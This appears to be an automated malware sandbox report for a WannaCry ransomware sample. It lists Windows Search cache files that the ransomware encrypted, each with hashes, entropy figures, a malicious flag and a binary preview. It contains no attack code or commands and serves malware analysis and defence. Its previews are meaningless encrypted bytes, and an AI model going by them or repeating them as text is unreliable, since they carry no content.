                                                  Preview:WANACRY!.......KlG..u.WK..0E7..E...""..9.K.<.....8#..K$/...c(<.....+3.!~m...[....K..wU.........R...G....Tym......`<..*..MDj~.....%d.q,....1Ict.U.'.YB.e..N^*g.t...m....M..J....|....J../.PJ.F%.<fK.(>.s.(.'".J...6.i....U.2.zdf.hB.8a).!.R..F...f.Y..Z./.P..:.....B.......CoZ.}..o....t:..8.....>./9..~.(./...Q..[.F....e..1.w.#y..?bk.....g...2.g.i...z$..%... ..p..m.].....v..&.z.~.D..v...._+.,...L....."..-.:....I.......i...jK..p....`.....f-m(. ....@.c.9W...%.ZA.n..~...VK.<0k..:K......'1J.....~ ....R....M...V.F..6.!...W....Y.......m ?g..........=....@W.a.D2..;I.W?..9..,......>."t...n..sP.{..+..B=.....*l.D.....\.a..S...#..........XY ...cmK.Po.C..2H...v..<....X.1....].Kb;..$.....Nk>=..%0x.zU6.C.@..(+`.-..q.x.".0..&......d..u..t.a1\}:q.I..2W\...Ig.~*..l;;.r...T.E.....<>...bc.y..U1=......_..3.@L#.H).."MS.U.... o...K..l.G.E.h_..Q.f...K...+......~t.....4.p...+..T.r:...]'h..Y*..4I#r).A......U...`.o..P.....T.|B.n"0b..Xq.n.5..[....j....../..zP

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.23512661241246
                                                  Encrypted:false
                                                  SSDEEP:6:bkET+NkoNOhDpK+ETwEXuenjo7EUBp8ijXcglw2ptgl/dSBn:bkET+N7OVpZ6w+u+jo50aMbnlFgn
                                                  MD5:0DFAAB377B7E926C8767173F71974C7D
                                                  SHA1:6A0D12FB8C0AA648CD8AE180C46618F7C0B3338C
                                                  SHA-256:E1D82A1042E01306925BA3766BD7EBA190C1F25D026DDFFDD62354B20CDE20C3
                                                  SHA-512:B652632573777C32CE534686264938C40EB0F33C470922DA052977B0F9690F2D603CC50F42DA3F3C1F48A72A4F3FB2318A1A1FC394499825A58BB22B65611A47
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....BlI........Sq....3"..+.m..A...skQN.:......../.V....r..6.. ..mL.iH.........l]...._.`n.-N"...R.v.-#.u...|.}.0..]... U.2.....,v........H..w.x^..RV6..pf..r.}I.G.x..S.M.t...]...Y.(.D.8.....3....M....&w.i.e.yE.$.(.E....(.3.J)B....=.5.A.{.W#....Os..x.............#8;...j.g8;..t.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.185703671591206
                                                  Encrypted:false
                                                  SSDEEP:6:bkE581srIJS3ZN2Ut7SlTQsLtRYx5MjOorcWlMDsV:bkE581seS3H52lTQuaQHrcLIV
                                                  MD5:170589C865E43DCA47EB02D22D65F9A6
                                                  SHA1:3A63EE5E1A11964FDF154914ED79CD3DF4DE52B2
                                                  SHA-256:2D189A4A989D36D8D6BC555CA5F0827331F9D845DE7B1787BE4D1AD4A040F712
                                                  SHA-512:1F20A1B28653E9DF453F08F0319F2D3BAE870EC644F4303EEA816868FCB788F116CB59A48795B1C4D06FDF7E2ADB28E2B4171862979D984B28484BEE49C76E3F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......oI.s/t..Y.k>...<.,.W..f>i...R..8),...SO.....|()........A1.......?T.....a...'5qd>.B...<...H!X.e...-...d..D2Y+../.`.-Y.W...H......../.."..,...o.jA.v.Y...j9..OS.0...xV#..S.;...=.._..M.xE..._.=I......u{..q...!T..]$.Qp+.n7.3.`0..t.z.W_..|.p.e...................Z.....|....i...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999152563242
                                                  Encrypted:true
                                                  SSDEEP:6144:80lBSOwDjyN3vOg8A73bgaAskCoeVLl6+3JbTObf2wdnCcr:FbwveZhr1oeFl6+5+
                                                  MD5:1DBF0AEB41734B9A40EE561E4EBC3E9E
                                                  SHA1:D641B18E7800772BBA1D53BECB9477E15E4A0987
                                                  SHA-256:6B73C5C07F8676E5F6F55132F728C732E3510BB62A5DA5A847A062DE7AAF36B7
                                                  SHA-512:F0287B3DFA3E102FEA52BF402D1D6C1DBBA60DC6834EE56FFECE54C1AC9C6589450F3E28B5A28EBD527FAEA43828E61299B302E0480101D234B8AF12DBA84B9F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........ z.xOm.$Z.u.].2_.`....?...!?..r$...~..>D......=e...a...~t...\NO..Xl".u>.{.'F.0...p6.k.....G{_..t.j..*.e.i....xNBC..p..5.p:&..K......,(D#l...B[H.&. "e]C>....B.8(._.MY.5.td...S...."......(:zk=..>...K.......6....>.p..0o.R.9.+.-......u.s.g..@ 6{..T}H.....B......P..."...y.S.|XS........../.......4....0.*.URC..@....@|.M...'...1>A.H.......V.`..*..Au..|.@.+ _/.^..Q.n.4..p.....>i._.O....M.h6...;...A.d|..6...:...O.t.J0..".gz....7.-.1..B...b...sM.I.<..Q2....M....,.EW.S..!."..E..Xk.$z6._V.$.o...Ih..'........b.......7,...<XP*.+.>F_....'.....Mx.@..I......X`..}#...0...T.r.C..3...".K.>W1K.|2.....=.}e....}t...\`.........f.DYKb....R......$.n\B....J.....r0K_.J"=../.};...Rk.m._V...5..E.j.LU?.,......dh.V...8....F...ap=..@`3.+.>....7.X.|vN.mF...3..U.....1{..y..u...$..w.A..y..gbG...D.......I.,@.._.z8..G..b..=B..9F..\...>..@>...z.06...vbbTU.`LS..P..{..S.X.....A.QB..y...V.!.........r..Y.z..B.8..7!.q^...<D.Yk>.F.T..y/W..7=.k...#......&...T*...(a.O.zx

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.234789229067494
                                                  Encrypted:false
                                                  SSDEEP:6:bkEEs9sKhuGKOb7QPsI9GpwMljWo4GNMGA3yAaRx/9jdr+3BL2rJ6tCYIw5:bkEL9So7QP6T4GNM13yLd9paxE6RX
                                                  MD5:7EE36CD8C7156CA28B0056802401FF27
                                                  SHA1:A5F3B5EEFB655E0889CABAB3D6C0B097A9289589
                                                  SHA-256:4A8359A8662B235DF7715E95CFC2A414F67631B8238A805E120CDB391E0465CD
                                                  SHA-512:1D2E48E65E92A084CBAEA544D60EB79AC2CCD237E555F9B939B12CF59A5A786DB288745B7DB6F5700F853D6913182BCC7EAF82F0D90D7D2A295F23E3588768DB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......%..:........o..I...a .V..$...{.s....wP....G.|E...0.0c..(Q.`...g.L...q:Y...ywp..pI...j..G.h........`..........9....P...6S....*..v..e..m.X;..|.T....=\S.d.u.jZ^.O.....g.....^.m=.P...O....O..4.;.$.4?:<.Q.......}.?WF3..?_.......#H.J.A..m.~......r.%-.................i!&Z..8..?.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.149652321786379
                                                  Encrypted:false
                                                  SSDEEP:6:bkE0z/g2ZkM8eGJC0U6LJPlaMC32Q3DNAEdMDDltIkBQEswjm:bkEg/jZkHeAmVMCrTMDDlbhC
                                                  MD5:FA7090F96D28443C812678ED736C9B45
                                                  SHA1:471FAF76E41C202232E1FD92A67626A00D7AB479
                                                  SHA-256:7E2649727062FCEF83C331F2E1620B55091848DB6A4FEA994A94CB48A3CEC845
                                                  SHA-512:0606119C4F571A6C9D0C74C467707F79FEDDA3A4BCCDD0430C96C2AEEF62983BC83FED6E7BDB2E977AA453FF13B83452B2D6BF27CBF7057010D005AE1CEF91E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....1............X...Z[4..R....|....<|...v...yV.d>KM.m..P.s%Dh....0.da...>..B4|F....N*.$.;.v.>.ol.I(..Y.P.O.G...]..|E.O...).@c..cDO..h;Y F...y"t...E?.}.`Vu;..SsG.......W...VUH..&.!..c..%.%,...g~Ax."....8uT...f..u..~.p.....\..E..E*Lmc 0.Ik.5aor...............d.o...-...F.4.&

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.998377237649061
                                                  Encrypted:true
                                                  SSDEEP:3072:/LxCI8stKMTkZukqheYKd5siQf1lu4b734:DII8OKikZchexONv34
                                                  MD5:F75786242A504A40893E782E6643B1F7
                                                  SHA1:F74E6AF967D91498F384776374A151DC8A2D03BE
                                                  SHA-256:534E3B91E2C7DA290B00C5A22ACAE707C4672940A1248F4DF9101FD3512022AC
                                                  SHA-512:051E7BE4F3235B71E710B402C3771E4A0489262EB3BE39FB6F5D749E7015B621EB51B313B146DBE108CE584BF93E9D05889FC10291D2BE7731DC274150C87682
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....vAI!.OE.}4R......$..buf...ju.\.?s..2..*...l.jtJRJ.VRS...z.m........M..NC.....u.t.u.lP3...qvBg..\.......s.G?3E}(....<..,}w....m...hG.A.u......G......A..G..G..R...L%`.9.......\....c_."?........E.3.q..A.j.q./Q....:.O.... +........S0...!pJ.U...x W....j.........1..>....*eQa)G7*L.w...'..l..8.-.*.d..e..G.t.4DK9..B.t......g..6L.....2.8...:.,.cr7>..{y..X2.lygJm.Tl.0.'..l..R.rM....M.=..9.t..Z`..@0H...|Whu.V.{.....|`NS.u..P}..I.93Q...9....4*....'..6%Qw..0T{.Lc.%*..*......B.d<&.3.M.....-9..<`..V"s......z/7...Y.BS8..k..E.\WwU.(d..Z.%.........x.....Bp#..W>..*.>....[.....5.....5."......8[.^..<...`1E.2hJ.mb.T.^.~.....%zT..8...T.z.#..g!7vO........'Y..I&._.....;...E%....~.F5..d.........zbh..g......].4.$...Z*..I...m..|D.k.D...D.........OK........C1ZC....t..@....#O.:f..')jW..%}".-...,.tA:2;.Ef.G.(.>.'1._}Q2..`...3..j..&....-...y..._.L...............?..g....=~...J2+p.../...........F=8....I.SLq...6..c...J,.!......&,n>.x..:.R.@..Ni6..tw;....o2M.vx...;=.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.9984923407272985
                                                  Encrypted:true
                                                  SSDEEP:3072:auuAksAy+Jgyb1tkKZt54BcR058Uc9l/+k:duAZ+2ybDko/XU8V
                                                  MD5:F5A48721DD66A6309CABD22A481BBACD
                                                  SHA1:4F948975567E1EAADAB6089036BEAD3131A4E2D6
                                                  SHA-256:972BB75BA461D62E1CADC5BCFE4CA1AA551D75D0EA11784C3BABBAE62FBBCEB0
                                                  SHA-512:E36A847965C5BEDBCDBF9ABE93D85EB2652597F79B5F962A742BC8E5A2CCC442980FCA5FB3699BC34F323B4E3A666123FC0A0D2F6918F33ACA11F8BE1DAD0BDC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....qm....v.C..e...v.]l..$.ooS....._..+.S..ry......c.g..p.R*m..:...(.@.1.......z.{......i.r.Tr*|fj.K..n...>7..f.,.....Z..i;.Vg...*q..W..&3.b..T<6fA.:.B..V.nZ\.A.pI...............J.....KI..m6.}`F..............fj.z. .&..2.M...p:,.+D......mn.s1.tI,....j.......v.m/ dn.\....:}D....7.L.9.0...N.Ie..n....Gp..M..Y.@T..E.....WwI/Q.=.Xp.2..^......o<..y...%..M....^.eF.`..*3Y.%*Z#.(.)4.......9K...8.X.8qZ.$_.......*.U].....t.~.[4.S.V......pQ"{I.RE}....|.A..].........-....si...V...C.P..*...=.Dx...HW;.}.w....3.|.{...H!).f..qFPK.P...Y..Crd:a...yb....$...i......65.uQ].....>...].2bD./.JY.Pm....`..:.Z..a..t..A......&..._.....<.m-~,U....E2.=..:W...h..e$.p.y.\....u..s:b..T..}..>.a?......:...j.9...V.....2.,......D:...1..#.g..;.......D>...>.M..Kb..A.N..4Z...P..nub..DZU..!.!+..3.......4..:..8.G.=..@.w`).*......E..4....g....w6.<c~......xa...I.0o!.l.o.Yv.c>.:.g.8.Hd....P..SY4.. ".7F.XO/Ov....j.k..d..'}.@..........`...7.>N..`...W...[...)...=.S.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998476469829722
                                                  Encrypted:true
                                                  SSDEEP:3072:WnfhCZPPsa8w/JeAIqATAV0NqCZb3AQqX5Qa:ofhCBsaFxeAbV0NfMQ65Qa
                                                  MD5:50AE92137338BBA0C8C01F3468D9E1FE
                                                  SHA1:09029EE3578D9317970EB9F4BAD75260CAC5ADCB
                                                  SHA-256:22B9EDC632747B3FF2B36042DB966A3D3C94000EF5BB744AE9FF0D209E6802AD
                                                  SHA-512:2E01E82D1C5709E780235F0B48A14CDEBECF54DA3FDF7E2AFE32665FDDDCECC0D270875FDDB52CA166AAA114009C1B5964F61566AB1C2363782772043B95D450
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........,.d3..4..#....N..,.z.!6.t. ..].....F.^R.$c..O8.(].rD...a.#H.h..."r(0......t.<..`.0..bh....Xa./..T..0.|^........px..3.".<..I..o>......L.j.e.3....0.u.C.j.9...6........'.DD.....k.|]....O.....5g..#....o......s.m~.?.tq...C.....r<*.Z..Ub...G............C....C..FBs.!_.......t.._.u!.)...y...$.uj.2...{......f7.....L.z..m~. ..w... ....?..V4..H....2._.* ......].2.l.L..+G".!.8.1a...,.)9w..w".EF{l.a..1....?5..{...oGa....=..h...J.Y.j}...%.0q..-...1...G..i....oY.z...0..H__e......eX...*.!.L.7%....WHM.e...+.(a.....2..u...Q.fwh....i|.U...pV..(..q....W.F..~d....Y..e...kP7L.}.#......0...o[.....k...C.mV..c.l....[..>x]./.....;.F...+.F=..B.u5.:.,Wo$.........V+._....[..@qwL[......l;gP.D.X........(.z..O..l..P.*.l.^..r....K30.:..O..XAP..0....y.nY4.=#...j..:....=..y....q.n.d.[~^khnt.^..c..g.w...]....ih<.{.....].<b..Pc.....6.^F..K..*..P.B .....A3.D...Bztj8 .u,.[..!.....e8.i.........z...M....g.(q..........1f..K.t..w....../..r.G.t..j... ....E.a...b}g...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129748497427.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998232436732257
                                                  Encrypted:true
                                                  SSDEEP:3072:M6LximSsgSdFi3NO+SIzP9eUCp9sWnh9oYF7E:ZNiav2NOWP97uSej7E
                                                  MD5:3D4A4588471E93890C28287305B326AF
                                                  SHA1:252D9CDA8609EED48DBFA8515066CBE33D1CD062
                                                  SHA-256:0AB0EFDAA75BE866AAFE115686BC67DC2D0A555E4B5A7995D9193A39D76423EA
                                                  SHA-512:2C2D9E757ED2C6A2C0B1118F6ED9B9F347AF1DBA9568377F82F5FB5C94F7F49D824A2E88A1F39ABE65E0F69865AEF9DC006E9A6FD2AE27D83F5C24B3937BCF1B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....o.!..-.-.,Z.3....4.y....!.?d....;.....!!.UMX&..`s..*..RKY.q.i......./yy_......[.o.}.._^..n.....L.!.D.^.%lepD...y.6.^#l./.....{..E.c..i.&.....5..w*.....Q.Up.!.$f....%-'...@t..y..H....p.......e.#7...4.....^...E..g..(...7q4.A..`E.Z8..).;1i..............wcK.i.....0.q.....gZk.Aw....2(.0.S..t~....BKL..2k.,..z.O.X...|....$.o._....c.0@n..\.y.u......qi.JH....5cw...D...`+...=E.:;wE.R....^...-..)l.UQh..u.C...=R:...x.....,P`0.+b...6...e./.=/..j)...].....2....l...Q.^J....G/..;F..$.....o..C$[..D\.......D.Cg...;...:.1Z...V..._.Y..==.z......ik|....F`...k..{..K~.E.4A. .....&Qt.$..V.p<...K.78..!.WYT...`....j..w._..........c...Q.).@\.z.V'..=..!.g.QA.~.....b.V.!Q.n..<........x.q.k..Q..i..p..fy..2...qo...l..nX..}F..t...W...7...jk..M.~E..?...=...?.lh...;..b...C3/v....!..MPGT......l9............Et...o.0..Zv..X...~.L.&.H.A+..+C.5.y../.N._.v. ::.2......w.......x...bL@.:....N.\..H..P"../2......[.:.z...k...C.->.q..,..=o'..h.J.H.z..].h.?..W........

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130048509273.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998395844064861
                                                  Encrypted:true
                                                  SSDEEP:3072:YZ3QGlCdIuI9LZXdLVl9ERrujqamdGulzmApndNBI:YGGduI9VXdLVgaCtVdNBI
                                                  MD5:BA9F8069B91187A9C959D395B88E043E
                                                  SHA1:E5AE9CAB771DF155664D9FAEF7EBF3FC9CEA55AD
                                                  SHA-256:D8CCE2ADC2DAF19E0B574531D802D0013A87DE93696134C9E788C0A986928652
                                                  SHA-512:87FE38124E5FE0E1EC78FE0CA7469065F12212AF9FF08727C5E5DD119639C5D5CC8EAB26478D8FE2B3BAEE42741AA8A64711458CEA9DA8C0020DDD8A9DA3E413
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......~.PP.(b..#aw.N=n......G.t.9.R.y[..E{n.$,3.67.B.....3.._^..V.o.,VHLiA......."....!P.oG..Q.w.........-.... ..m9...6..Eb....7.g......./..c.{<:q.Wo].....#=..<.C_5..S.3..d8..B!.j..4..]...@.... ...K4..........UT.[<..Np..n..u+.p...&[.FO..B<.....]>...............|...s7.|g$......:6%..Df...7.?..2.!.Y..eH..{...3.n.u.c.@.....^..f,.n4q....HiTWi...k.oL.../."vV2c=.(J.@..F.s..Z...Y....}....@5tA.,%....:..k>..A..!Qz.-.0..arc.........G?...x...........Bif.u....._...ksb..1m.&..Y.......Gbwn.0.K.h)e....5.%....V..6.A>AYG..4BF\U.7...........:..em.....`. .Ls9..+).Y..Bkw.w.....@.K..|....|@..^D.A...^@.~H;.l4.....@.l..`...FK..f.(.....[3r....6}..D......QTM'i....Y..Z!IX.v.)....I. .|...X.....5r.q0.1n.....xZ....a...c.2iB.j.^.^.K.S..3G.V.I:.g........"s.=....=>^.+../z...5.B.V...+...i...x'A.|z.....A.b.c6.-.J..E....'N7SD......q...qj.....0../.....S.C..7.6...l.....!.....#....m$.....T...=.d..;kyCR.WS...$#........1..RMb.%IyD.7Q.'.R......R..v......[...).}!.#{..o.:~I

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130348618804.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998277506079741
                                                  Encrypted:true
                                                  SSDEEP:3072:IetzI9nslYegg24MDfNWtS1l1MaJG8L7+WTm:IcunS0UtS1DMeGKy
                                                  MD5:DA9B6D9DA80F8C4413EA37357608C442
                                                  SHA1:7BABFEA22847A82ADCE61424E2BB901765428C31
                                                  SHA-256:B9F9B6F683CE2899E6A7F714197BBD3A555C879EDCF16AF273103B3BD315AA80
                                                  SHA-512:8095BF253BC784988F8242E33F75FA4ED8BC307CA6F2E9400C35C8455E17277E12C76BEE15DDD98531FA8CCC9DBF78AC607439C8A283BF1E59D306ADB0DFAACC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......r...8.+.-....n.nJ.R..<.+{.....+.....!,.;..m.....w...(.|..C....m~.$.p.W.U.t3....s.#Z.^..`...>..N..".np..#.,....E...)U......*..)..85......T?R.sm-b...7..D..Gq..FH...C.X.;....}....._}<...iV.VO.RR..2B3`.1..H. ih..,.h.9B...p.3K..2+.....{...D...K%T..............3...YB...H.!*l....r~;.3@:..ie...@g.....I.W..T./..Y..S.-...m.K$M..e$....M..R......F..?..h...{f...D){..g.......|.X....=.........K.........C(.V).O...Y..:].;......r..~L....&.\........4..B"...&.Q.;..4.6F.;..............6......S......|...'.%[m.3....3A.k5)......?.V............I^6I...P..`..R&vG...=...?....b..$ze....^).fa.:R.5!.v.......w.>..X..f!5..f........T..JX...n.r.V~....V.z.[.y#..:.......g.S..R%.....r...6..!.2...0.`.q......O......6......l......Q..R..g..@..........{.t......<.d.:.<.E\0.o..7L2.}.....F$7q.l..,YX.Q.\m.Z.....JU.J.!<.}..s<)....C......v.%.cv4.....-L,.....S..O..u...29.a..{+.M./z..(|$......;y.<..2.R..Nu./...N.%8:^l......}.d.7gv.z..D..=8+..Qq.l1K...^..7..5...G/4.C/,.f...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998572049377344
                                                  Encrypted:true
                                                  SSDEEP:1536:COWfWK4H/+Pd5HRymYJOD9RbI4jF0Mq+OqcQDuxpyJGiV1Wl0Q97VTCI8z:CuWPddRYcjIeiL9rYGE1Wlt7CV
                                                  MD5:592D2F7DC8904EDCE4DEE2EEB6018B6D
                                                  SHA1:99D1908BF39F9508AD3F7B6C85FAB3951428CC7F
                                                  SHA-256:EEF24852772FE3DBD906272D80F4DFACFAD6B8D5DC59A41D50D0391188026FAD
                                                  SHA-512:ACE6349F81040077214ABEEE05A216B863D76B6408C4E2CFCE898F7D946404AEDCCF2A4640D751B24B81A315534F129D31574E6F89A98C66FAE32DB7BE84DA30
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....#........3.h!.g..!p.}...E.....I.....go.SZ:X ZsL....5.@4..."......^.NG[.ZP..%./....FX.:q.^>q...1E.........@._..c).~.a.).|{.<,.......X'.1K-6..O.....A.!.J0"...1H..?.q.7O.M..%/.X...D]..{...`&.......NUEW-A.......M....I.?....i.()0..N.`\.E'...u..J....M..............Cq.......-.vn....5cE.m.i...u.<.D4..C...V.#r"....%=..>..]".U...b......J...l.Dz.&.}......`..\.o..=m.x.7.>..t..Sx....z...a...E..r(..t......T..{.S"..|..].../o.%I!....yWF.w.~.7...H)..........Z$.v...W|.%q...X...Yu....S.....~1...;pNe.K.....[I..)..R......._e..x..u[*.Q....sXM.|..._{...wL.5..D...j....ZZ..f.#.Pm...P.I+...jB.j..........0.........=......7....9X...a_.....3..{X.D..."......Q....^.!...mY^X.%.u.0..h../...)0.q[57..^.w.4....`Z...l...N.t......H.........j...Q..V.......GMZ.V2&..E..z0...>Y.2(o_.1.M.hY4..u|.h.pUt^{K..XC.sdsM..)....?.[.&...=.CAb.%J..a.....y.@t..!e#..;..sF.].4.6|..\....j.$...NT...."...~..v.O.....<.9[D.......*xs.l;.9V..(..cb@..Pp...r1.y...r....&..=..Y".6.T..3-..;Gi

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):690472
                                                  Entropy (8bit):7.999708855093496
                                                  Encrypted:true
                                                  SSDEEP:12288:xKIdDmmA7Xc23KltAZ66ggEkDrRgUp4QnQy2509cBYnyQiJlXv:xKItmqlqf9DFgn09SYyvJZv
                                                  MD5:26252CA5C0E8985BFFCD718988E40BEC
                                                  SHA1:0EEDEFC9EC1B5026B88C80AC854B2A4BF7819911
                                                  SHA-256:D2CBDC183BD6F7826FB5A13C52B425E3F0AFF9AE9492E6EB66000F87ACAC06F2
                                                  SHA-512:529B1A92271C4D4DFFF03E1412E6499E1F190D4848F009341215D79F294144289A7E344AF7CA0F92EC7F0E761E0F782DC90C9223FE61DB3F3F7D85427F627A96
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......i.~!.=lY..&...mrH....x!.c.........._iT..C.<\|....^C..v|..<.......{.p....[.o.....f...q.z.KP..g[mu.K...O./........L..u..P...P.[.Yt.*5...3a....`.....V.P,.6e.e`..].VM.....>..[.(.P">l,..)?OQ.?Wd..B.f8:r..-{..o.vi..$d*z....jVo.....EMK?...5*..D..yR.=;...............J.....B.Z.m...oL...#k.A.h.v..K...M.^.X.Z....h..k\S...~.S.i7....?.I..2.1.}.~.......-W..@L.h...e...N..[.b...=.q$.....Q...`... ..S..:.7..J.....9Z.#r?...Nk......XI3.sh...H.tYx1x.1>...........&_*..p....M.].r..>m]C....pM...b.F..ej.S~7...`.Hr..8...&....P.uI....p.?c..B.....I..y.."......Y.C....<..../.....yv(.L.#t..J..8..X..O%T7..a&.0...w_.......s...... ..h..]....1.....R.[..............$v_..7q3....6EX.J../.u)Zs>i.k?..%..A.h.G.....Rj.....V....jO....O..1....V.K$.D.&.).$.Y.u....`c..=O7..zUkuT]-...g.....~...~...#..Z..5.....R;M'......-..1k.BK..q.#wY6E,O.....'Q$|....:Se..#.(.0..=..p.i....3.j........=.V...F.(,l.......~....:d.u0:.?!gU.>0|....O......)?...oC...i&:..ZI..Tk...j..H..!..>..T@A.|7

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1816
                                                  Entropy (8bit):7.877670034236576
                                                  Encrypted:false
                                                  SSDEEP:48:bkSbFEVV24XZgd/r9MkliTsDEXAuANSPEoSyCxvNExvSHGI:oUOnXqj9MkliTq7SPET3HExvSHz
                                                  MD5:CF2B9581C8B2D6D0FAC71AD2D0273B94
                                                  SHA1:425DFE9798E84082EC33A78230D50AC05015C005
                                                  SHA-256:082C7578A170B9AB67CE4122AA766A84731AD19F74E76256CFD7C98E48AEC163
                                                  SHA-512:1B63B6441B029BEE5F12841EA316642A03F284D13964CF61C75F7F2C76EC0B8C2506F896651F0D00DCCD477FF5357685AB779046CB43924239A73BA9451EFA2B
                                                  Malicious:false
                                                  Reputation:unknown
